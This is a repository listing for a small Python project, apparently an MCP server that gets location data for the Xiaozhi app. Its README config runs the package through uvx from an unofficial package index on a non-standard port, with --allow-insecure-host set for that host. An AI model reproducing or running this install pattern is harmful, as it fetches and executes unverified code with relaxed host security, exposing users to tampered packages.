https://github.com/ailearncoder/xiaozhi-location-mcp
小智App 获取定位MCP
https://github.com/ailearncoder/xiaozhi-location-mcp
Last synced: 3 months ago
JSON representation
小智App 获取定位MCP
- Host: GitHub
- URL: https://github.com/ailearncoder/xiaozhi-location-mcp
- Owner: ailearncoder
- License: mit
- Created: 2025-05-28T04:02:23.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-05-28T04:04:04.000Z (4 months ago)
- Last Synced: 2025-05-28T05:18:55.410Z (4 months ago)
- Language: Python
- Size: 19.5 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
### MCP Usage
```json
{
"mcpServers": {
"xiaozhi-location-mcp": {
"command": "uvx",
"type": "stdio",
"args": [
"--index",
"https://pypi.mac.axyz.cc:30923/simple",
"--allow-insecure-host",
"pypi.mac.axyz.cc",
"xiaozhi-location-mcp"
],
"env": {}
}
}
}
```